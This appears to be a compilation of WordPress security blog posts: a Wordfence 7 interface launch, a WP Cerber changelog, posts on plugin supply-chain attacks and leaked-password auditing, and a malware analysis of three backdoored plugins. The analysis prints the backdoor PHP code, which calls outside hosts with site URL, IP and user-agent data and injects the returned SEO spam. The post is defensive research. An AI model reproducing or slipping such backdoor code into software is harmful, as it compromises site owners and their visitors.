Introducing Wordfence 7

Wordfence is the most popular WordPress security software in the world for good reason. The protection offered by the endpoint firewall outperforms alternatives. The scanner delivers the best detection in the industry. A long list of other features like country blocking, two-factor authentication and password auditing make Wordfence the best and most comprehensive security solution available for WordPress.

From the beginning, our development efforts have always focused on function over form. Having rapidly innovated for so many years, the resulting software does an extraordinary job of protecting WordPress websites, but it is also quite complex. Last summer we decided it was time to make a major investment in the user experience, making Wordfence not only the best security software available, but also intuitive and incredibly easy to use.

For the last 6 months we have been hard at work rebuilding the Wordfence user interface from the ground up. Today’s release of Wordfence 7 revolutionizes WordPress security by making a deep and complex product easier and more intuitive to use. We think Wordfence 7 is amazing, and we know you will, too.

 

Overview of Changes in Wordfence 7

Our goal with Wordfence 7 was simple: make Wordfence intuitive and easy to use for all users.

It needed to be easy for the novice to understand and configure without taking away any functionality from more advanced users.

To achieve that, we made the following high-level changes:

  • Updated our design framework to use modern interface standards
  • Focused more on the core Wordfence security features, like firewall and scan, and less on everything else
  • Eliminated the ‘Options’ page and added options sections for each feature
  • Added feature status indicators for core features
  • Added a help page with links to documentation and support options

Design Framework

Based on current UI/UX patterns and trends, we’ve built a framework using standard interface and experience approaches. The dashboard and feature pages provide configuration status, alerts and reporting. Detailed configuration screens are easily accessible with relevant links throughout the experience. Status summaries are interactive, guiding the user directly to the security hardening opportunities and giving you real-time information on the impact of any changes you make. The resulting software is more discoverable, approachable and user-friendly.

Feature Status Circles

One of our objectives with Wordfence 7 is to provide security hardening opportunities to users in a simple, intuitive way. With that in mind, we are introducing status circles. They provide a clear status summary for each feature. By hovering over the status circle, you will trigger a popover detailing the list of things you can do to improve the percentage shown. All popovers include a link to detailed documentation.

We also include status circles on the scan and firewall options pages, giving you immediate feedback as you improve your security posture.

Here’s an example of the status circles on the new scan page in action:

Simplified Dashboard

The new version of the dashboard is similar to the one we added in Wordfence 6, but is now less busy and even more useful. We added feature status sections for the firewall, scan and Wordfence Premium. You’ll still find notifications here, primarily based on scan results. Global options for the plugin are now accessible via the link on this page (more on our options page approach later).

Finally, we removed most of the charts from this page, leaving just a high-level Firewall Summary and a chart of attacks across the Wordfence network.

Simplified Navigation

We reduced the number of navigation options from 8 to 6. The two most important features, firewall and scan, are still available in the main navigation. Blocking is now accessible in the Firewall section and Live Traffic has been moved to Tools. Links for both features can be added back to the main navigation via their respective options, for those of you who prefer it.

The Options page has been removed completely in favor of a new approach.

New Options Sections

Prior to Wordfence 7, the majority of the Wordfence configuration options were on a single page. While there are some advantages to that approach, we found that it caused a majority of our users to never discover many useful features and options.

With Wordfence 7, you will now find an options link on all major feature pages. Global options are now accessible via a link on the Dashboard page. All options links can be found next to a gray gear icon.

Help Page

We know that security is a complex topic, and that configuring Wordfence can be challenging for less technical users, especially with some of the more exotic hosting configurations we sometimes come across. In an effort to make it easier to find the documentation or support you need, we added a Help page to the plugin. It includes links to our documentation organized by feature, along with links to our most popular help articles. Links to our free and Premium support options are also available, and you will find links to the new help section throughout the plugin.

Alongside this project, we also completely revamped our documentation for the product. Our old documentation will still be available for a while, but we will no longer be updating it going forward.

New Firewall Interface

The firewall interface has changed significantly. The main firewall page now includes four status circles, providing a broad overview of your site’s configuration status at the top. All firewall-related options are now accessible via the options link on this page. All firewall-related reporting is now available here as well.

Blocking and Rate Limiting are also now available via links on this page.

New Scan Interface

We’re really excited about the new scan interface. It’s exceptionally functional, very usable, and beautiful at the same time. At the top you’ll find status circles, summarizing your current configuration status. Below that, you will find the “Start new scan” button, along with links to Help and Options.

The Scan Options area is now where you set up scheduled scans. We removed the Scan Summary section and replaced it with a new status summary bar, displaying what the scanner is working on. The Scan Detailed Activity is now hidden by default, but you can reveal it by clicking the “show log” link above the results table.

The scan findings table has been revamped to show a summary view of each finding by default. You can view the details of the finding, and take action on it, by clicking the “Details” icon.

We also added statistics to the top of the table showing a summary of what the scanner found the last time it ran.

Other Updates

The Blocking interface has been completely redesigned. IP, Country and Custom Pattern blocking features have all been combined, and block count reporting is now available for each blocking rule you create. You can now manage and monitor the effectiveness of blocking rules in one place.

The Diagnostics page has been completely redesigned. All diagnostics sections are now collapsible, and collapsed by default, to make it easier to find what you’re looking for.

We replaced the product tour with a new guide that runs as you access each area of the plugin. We will be leveraging this new capability when we roll out new features that require more in-depth explanations, including the launch of Wordfence 7.

Live Traffic has been completely redesigned. The traffic table now shows summary data for each observation. You can view more detailed information by clicking the “View” icon. Viewing whois information and seeing recent traffic is now presented in a beautiful popover.

Wordfence has always included a great comment spam filter. Unfortunately, it was buried in the Options page, split into two different sections. In Wordfence 7, it now has its own page in the Tools section, which now includes basic reporting.

Thank You

It took us many months to get this right, and many people contributed to making this release happen. A big thank you to the hundreds of beta testers who helped us over the last couple of weeks. Your feedback has been invaluable.

With today’s release, we are excited to bring Wordfence 7 to the global Wordfence user community!

If you do find an issue, please submit tickets via Premium support or the forums so we can get them fixed. And as always, we welcome your comments here.

The post Introducing Wordfence 7 appeared first on Wordfence.

WP Cerber Security 6.0

New features

Hacker attacks on websites get stronger and smarter because fast-growing technologies create new opportunities for hackers and cybercriminals. We cannot ignore those facts and that’s the reason we’ve implemented a new feature: Traffic Inspector. It’s a specialized request inspection algorithm that acts as additional protection layer. Since v 6.0 WP Cerber Security performs inspection all suspicious requests and blocks them before they can harm a website. This security algorithm is enabled by default and requires no configuration. We will be constantly improving based on the knowledge we get during collecting and analyzing hacker attack patterns in our Cerber Lab.

Traffic Inspector not only inspects requests but also optionally logs them, so you can inspect them manually. Is it possible that the logging slows down website performance? Probably it’s possible on a free hosting if the logging all traffic is enabled, ignore search engine crawlers is disabled and saving requests fields is enabled.

Improvements

  • Added ability to clean up Cerber’s DB tables. Now you can manually delete all rows in a Cerber’s DB table on the Tools / Diagnostic admin page. Note: this operation cannot be rolled back.
  • If your hosting environment (web server) has some issues and those issues can affect plugin functionality, they are shown on the Tools / Diagnostic page.
  • On the Access Lists admin page there are new links for each entry to check HTTP requests from a particular network or an IP address.
  • Added protection to prevent scheduled tasks from being executed multiple times an hour. If you, from time to time, get several identical weekly reports, that is your case.

Updates

  • Language translations have been updated. Thanks to all translators!
  • JavaScript code is improved to eliminate excessive fields in GET requests.
  • Code performance optimizations.

Bugs fixed

  • To eliminate possible warning messages in the server error log or the WordPress dashboard, the inet_pton() function has been replaced with filter_var().
 

SQLi Vulnerability in YITH WooCommerce Wishlist

SQLi Vulnerability in YITH WooCommerce Wishlist

As part of our regular research audits for our Sucuri Firewall, we discovered an SQL Injection vulnerability affecting the YITH WooCommerce Wishlist plugin for WordPress. This plugin allows visitors and potential customers to make wish lists containing products in the WooCommerce store, and is currently installed on 500,000+ websites.

Are You at Risk?

This vulnerability is caused by the lack of sanitization of user provided data in versions below 2.2.0.

Continue reading SQLi Vulnerability in YITH WooCommerce Wishlist at Sucuri Blog.

WordPress Supply Chain Attacks: An Emerging Threat

In the last few months, we have discovered a number of supply chain attacks targeting WordPress plugins. In this post, we explain what a supply chain attack is, why WordPress is an attractive target for them, and what you can do to protect your site.

What Is a Supply Chain Attack?

In the software industry, a supply chain attack exploits a trusted relationship between software vendors or authors and their customers. For WordPress, that means figuring out how to embed malware into software updates. In one case, we saw an existing plugin author install malware on customer sites in an effort to monetize an existing plugin. In every other case we have uncovered, the attack was carried out by someone who had purchased the plugin with the express intention of attacking its users.

Here are the WordPress supply chain attacks we have recently uncovered:

These attacks work because, as a site owner, you have already made the decision to trust the software vendor or author. In many cases, you may have gone so far as to enable automatic updates for the plugin, allowing the author turned attacker to push malware to your website any time they want.

Why Is WordPress a Target?

WordPress is an attractive target for supply chain attacks for a number of reasons.

The first reason is simply scale. According to w3techs, WordPress powers 29.2% of all websites – a massive user base to go after. In addition, at the time of this writing there were 53,566 plugins available for download in the official WordPress.org plugin repository. That is a lot to work with on both fronts.

Secondly, the WordPress.org plugin directory is an open, community-driven resource. According to the plugin guidelines page, “It is the sole responsibility of plugin developers to ensure all files within their plugins comply with the guidelines.” This means that while there is a small team tasked with managing the plugin repository and another small team focused on security, ultimately users rely on plugin developers to keep them safe.

Thirdly, most WordPress sites are managed pretty casually. Making a change to a website at a larger company might include code review, testing and a formal change control process. But that’s probably not happening consistently, if at all, on most smaller websites. In addition, many site owners don’t monitor their WordPress sites closely, which means malware can often remain in place for many months without being discovered.

Lastly, the WordPress plugin repository has a huge number of abandoned plugins. When we looked back in May, almost half of the available plugins hadn’t been updated in over two years. This represents a great opportunity for ne’er do wells looking to con unsuspecting plugin authors into selling something they created years ago and have moved on from.

Why Do WordPress Plugin Authors Sell Their Plugins?

The large majority of plugins in the repository are completely free to use, meaning there aren’t any premium features available for purchase. While that is generally a very positive thing for the WordPress community, the reality is that all the people behind those free plugins still need to make a living. If they aren’t making money from the plugin they created, they often lose interest in it or abandon it altogether.

When someone approaches them offering money for their plugin, it may be hard to pass up. And the plugin author may think it’s a perfectly innocent offer, because it’s not like the supply chain attacker announced their bad intentions. On the contrary: in the purchase solicitations we have seen, they often come across as someone wanting to help.

This is an excerpt from a solicitation to purchase a plugin that we saw earlier in 2017:

I am wondering if me and my team would be able to purchase this plugin from you and then take over the complete development of it and push out a new update to make it work better with the latest wordpress.

We will also put our admin team onto the support forum and make sure the users are happy and if there are any features they are specifically asking for we will get them added in to the next update.

As a plugin author who created something that thousands of people are using, what a wonderful opportunity! This nice person is offering to not only pick up where you left off with something you cared enough to build, but they’re willing to give you money for it as well.

How to Protect Your Websites

Fortunately, you can protect your website against these attacks with a number of effective tactics.

  1. Screen plugins and themes very carefully. Every time you install a plugin or theme, you are allowing a new person’s code to run on your site. In general, the more established and active the author, the better.
  2. Scan your site for malware regularly. We recommend enabling scheduled scans by both Wordfence and Gravityscan. Both include a free scheduled scan option.
  3. Check your site and IP address against blacklists regularly. Gravityscan checks over 20 of them for free.
  4. Exercise great caution when the WordPress.org repository removes or “closes” one of your installed plugins, or when it changes hands. Wordfence alerts you when a plugin has been removed from the repo for any reason.
  5. Consider removing or replacing abandoned plugins. Authors of these plugins are the most likely to sell them. Wordfence alerts you when a plugin hasn’t been updated in 2 years.
  6. Keep an eye on our blog. We will continue to share information about plugins that have been compromised as we discover them in our research.

Conclusion

Unfortunately, we believe that these types of attacks on the WordPress ecosystem are going to grow in popularity. Attackers will also very likely employ new and creative tactics that we can’t foresee in the new year.

As a site owner, you will need to apply extra scrutiny to every plugin and theme you add to your website while keeping your eyes open for anything odd that crops up to stay vigilant against any such potential attacks in the future.

The post WordPress Supply Chain Attacks: An Emerging Threat appeared first on Wordfence.

Wordfence Now Includes 1.4 Billion Leaked Passwords in Password Auditing Feature

Last week, we reported a massive upsurge in brute force login attempts following the leak of a database of 1.4 billion clear text credentials. No one had seen 14% of the exposed username/password pairs before, making this a ripe opportunity for hackers to attempt to break into WordPress sites.

Historically, brute force attacks targeting WordPress have not been very successful. But this new database provides fresh credentials that, when matched with a WordPress username, may provide a higher success rate for attackers targeting sites that do not have any protection.

Password Auditing Improvements

Wordfence Premium includes a powerful Password Auditing feature. Using a GPU cracking cluster, we give you the ability to audit the strength of your admin and user passwords. You can learn more about how this feature helps protects your site here.

In response to this latest leak, we’ve merged this updated password list into our own large password list that we currently use to audit administrator accounts. Our previous list contained 269 million known passwords from various breaches, such as LinkedIn, and eHarmony. After merging and removing duplicates, this new list comes in at 609 million known passwords against which we can test your users’ passwords.

We ran some initial tests to compare how our previous list performed against the new list. In a random sampling of 100 user accounts, our previous list cracked 42% of the 100 password hashes. The current list cracks 57% when run against the same list. That’s a 36% increase over the previous capability. This means that a Wordfence password audit is now 36% more likely to find a weak password than before.

Recommendations

We strongly recommend that you upgrade to Wordfence Premium to benefit from the new capability we’ve added to our Password Auditing feature.

We also recommend you follow these additional steps:

  1. Install a firewall like Wordfence that intelligently blocks brute force attacks.
  2. Ensure that you have strong passwords on all user accounts, especially admin. Wordfence provides an option to enforce strong passwords when creating/updating a user account under “Login Security Options”.
  3. Change your admin username from the default ‘admin’ to something harder to guess.
  4. Delete any unused accounts, especially admin accounts that you don’t use. This reduces your attack surface.
  5. Enable two-factor authentication on all admin accounts. Wordfence Premium provides two-factor.
  6. Enable an IP blacklist to block IPs that are engaged in this attack. Wordfence Premium provides a real-time IP blacklist.
  7. Monitor login attempts by configuring alerts for when an admin signs in to your website. Wordfence (free version) provides this.
  8. Do not reuse a password on multiple services. That way, if you have a password from a data breach in this new database, it won’t be the same as your WordPress admin password. You can use a password manager like 1password to manage many passwords across services.

The post Wordfence Now Includes 1.4 Billion Leaked Passwords in Password Auditing Feature appeared first on Wordfence.

Three Plugins Backdoored in Supply Chain Attack

In the last two weeks, the WordPress.org repository has closed three plugins because they contained content-injection backdoors. “Closing” a plugin means that it is no longer available for download from the repository, and will not show up in WordPress.org search results. Each of them had been purchased in the previous six months as part of the same supply chain attack, with the goal of injecting SEO spam into the sites running the plugins.

What We Know About the Plugins

Duplicate Page and Post

URL: https://wordpress.org/plugins/duplicate-page-and-post/
Active Installs: 50,000+
Current Owner: pluginsforwp (joined WordPress.org July 10, 2017)
Sold Date: August 2017
Removed from WordPress.org date: December 14, 2017

The original plugin author responded to our request for information on the sale of the plugin, confirming that they did indeed sell the plugin to a person named Daley Tias in the summer of 2017. However, we were unable to find any record of a person name Daley Tias online. The original plugin author has not shared the purchase solicitation message with us at the time of this writing.

The Backdoor Code
This content injection backdoor first appeared in version 4.2.1 (released 4 months ago):

$request_url = 'https://cloud-wp.org/api/v1/update?url=' . urlencode($url) . '&ip=' . urlencode($ip) . '&user_agent=' . urlencode($user_agent);
$response = wp_remote_get($request_url, array('timeout' => 2));

$this->data = new stdClass();
$this->data->content = null;
$this->data->confirm = null;
$this->data->contact = null;

if (!$response instanceof WP_Error && $response['body']) {
	$data = json_decode($response['body']);
	if (null !== $data) {
		$content_position = $data->version;
		if ('1' == $content_position) {
			$this->data->confirm = $data->data;
			if (!$output_buffer) {
				$this->data->content = $data->data;
			}
		} elseif ('2' == $content_position) {
			$this->data->content = $data->data;
		} else {
			$this->data->contact = $data->data;
		}
	}
}

The backdoor makes a request to cloud-wp.org and will return content based on the URL and user agent passed in the query string. This code runs on every request to the site, so it can be used to inject content to normal site visitors, web crawlers, or the site administrators. We’ve seen content injection in the past, and it’s typically used to inject cloaked backlinks, a form of SEO spam.

No Follow All External Links

URL: https://wordpress.org/plugins/nofollow-all-external-links/
Active Installs: 9,000+
Current Owner: gearpressstudio (joined WordPress.org March 17, 2017)
Sold Date: April 2017
Removed from WordPress.org date: December 19, 2017

The original plugin author shared the original purchase solicitation with us:

Hi [redacted] and team, I hope my email finds you well.

My name is Leon, I’m a facilitator who is given budgets by companies to acquire just about anything.

The client I have at the moment, is looking for a lucrative exchange with developers of modules / extensions, themes and plugins for Joomla, Drupal or WordPress.

My client is looking to purchase existing unsupported plugins which can be easily updated by his team, in order to boost their developer profile and online presence. I notice you have a number of great plugins and my client would be interested in a deal on either, or both of these for the right price:

https://en-gb.wordpress.org/plugins/google-analytics-track-outbound-links/
https://wordpress.org/plugins/nofollow-all-external-links/

Let me know whether this is of any interest to you.

Kind Regards,
Leon Goodman

There are a number of people named Leon Goodman online, but none seemed to match the profile of someone who would be interested in buying a WordPress plugin.

A company called Orb Online in West Sussex, UK made the payment for the plugin. A quick Google search leads us to their website: “Orb Online is a UK based digital marketing agency, specialising in SEO, eCommerce and Magento web development.”

The Backdoor Code
This content-injection backdoor first appeared in version 2.1.0 (released 8 months ago).

if (self::$data['report'] && self::$advancedSettings['improvement'] = 1) {
	$requestUrl = 'https://cloud.wpserve.org/api/v1/update?&url=' . urlencode('http://' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']) . '&agent=' . urlencode($_SERVER['HTTP_USER_AGENT']) . '&ip=' . urlencode($_SERVER['SERVER_ADDR']);
	$response = wp_remote_get($requestUrl, ['timeout' => 2]);
	if (!$response instanceof WP_Error) {
		self::$data['response'] = json_decode($response['body']);
	}
}

add_filter('the_content', ['noFollowAllExternalLinks', 'interceptContent']);

Similarly to Duplicate Page and Post, this backdoor makes a request to cloud.wpserve.org and returns content based on the URL and user agent passed in the query string. Content injection looks to be bound to a setting in the plugin called “Improvement scheme” which is enabled by default. Disabling the setting doesn’t actually turn off the injection since the code in the if statement is setting the value instead of comparing it to 1. The code verifies that the user agent matches a web crawler (like Googlebot), so it looks like this backdoor is used for SEO by injecting backlinks onto the page.

WP No External Links

URL: https://wordpress.org/plugins/wp-noexternallinks/
Active Installs: 30,000+
Current Owner: steamerdevelopment (joined WordPress.org June 29, 2017)
Sold Date: July 12, 2017
Removed from WordPress.org date: December 22, 2017 (we’re assuming this based on the date of the last update note, from a member of the WordPress.org plugins team)

The original plugin author was very helpful, providing the original purchase solicitation he received:

Hi Jehy, I hope my email finds you well.

My name is Daley, I’m a purchaser and I’m contacting you on behalf of my client.

My client is looking to purchase existing WordPress plugins, even unsupported ones, which can be easily updated by his team of developers in order to boost his developer profile and online presence.

They would be interested in purchasing any plugins you have developed, or currently own. In particular they may be interested in this one https://wordpress.org/plugins/wp-noexternallinks/

Let me know whether this is of any interest to you.

Kind Regards,
Daley Tias

This correspondence is very similar to the message that the author of the No Follow All External Links plugin received above. While the two messages do not match word for word, they appear very likely to be slight variations from the same template.

The same person (or alias), Daley Tias, purchased both the Duplication Page and Post and WP No External Links plugins. Payment was received from Orb Online, with contact email address of info@orbonline.co.uk. This is also the same company that paid for the No Follow All External Links plugin.

The Backdoor Code
This content injection backdoor first appeared in version 4.2.1 (released 4 months ago).

if ($this->data->report) {
	$request_url = 'https://wpconnect.org/api/v1/update?&url=' . urlencode($this->data->url) . '&ip=' . urlencode($this->data->ip) . '&user_agent=' . urlencode($this->data->user_agent);
	$response = wp_remote_get($request_url, array('timeout' => 2));

	if (!$response instanceof WP_Error && $response['body']) {
		$data = json_decode($response['body']);
		$content_position = $data->version;
		if ('1' == $content_position) {
			$this->data->buffer = $data->data;
			if ('all' !== $this->options->mask_links) {
				$this->data->before = $data->data;
			}
		} elseif ('2' == $content_position) {
			$this->data->before = $data->data;
		} else {
			$this->data->after = $data->data;
		}
	}
}

In the same manner as the previous two backdoors, this one makes a request to wpconnect.org and returns content based on the URL and user agent passed in the query string. The code verifies that the user agent matches a web crawler, so, again, it looks like this backdoor is used for SEO by injecting backlinks onto the page.

Wpconnect.org resolves to the same IP as cloud-wp.org, 52.14.28.183, the API endpoint used in the Duplicate Page and Post backdoor.

Conclusion and Recommendations

We know that someone with the name or alias Daley Tias purchased WP No External Links and Duplicate Page and Post. We also know that the backdoor code for both plugins call an API endpoint hosted on the same IP. The same company, Orb Online, paid for both the No Follow External Links and Duplicate Page and Posts plugins. Additionally, the purchase solicitation for No Follow All External Links was written from the same template used to solicit the purchase of WP No External Links. All three plugins were purchased by a WordPress.org user that was created within a month of the purchase. Furthermore, the backdoor code used in all three plugins is very similar.

Based on this evidence, we are confident that the same criminal actor was responsible purchasing and adding backdoors to all three of these plugins with the goal of injecting SEO spam into the thousands of websites running the plugins. It is not too much of a stretch to assume that Orb Online has been leveraging injected spam links to boost search engine rankings for their customers.

Supply chain attacks targeting WordPress plugins are becoming more and more popular. Wordfence lets you know when a plugin has been removed from the WordPress.org repository. As a site owner, it is incredibly important to stay on top of these, and treat removed (or closed) plugins with an abundance of caution.

If you have any of these plugins running on your site, we recommend that you remove them immediately and that you make sure that SEO spam hasn’t been injected into your site. Even though one of them, WP No External Links, has been updated to remove the backdoor, it has been closed, so it will never be updated again in the future.

To check your site, we recommend running scans with both Wordfence and Gravityscan (with the Accelerator installed).

Finally, a big thanks to the original plugin authors who provided the critical information that allowed us to connect the dots.

The post Three Plugins Backdoored in Supply Chain Attack appeared first on Wordfence.

Top

Fresh View Partners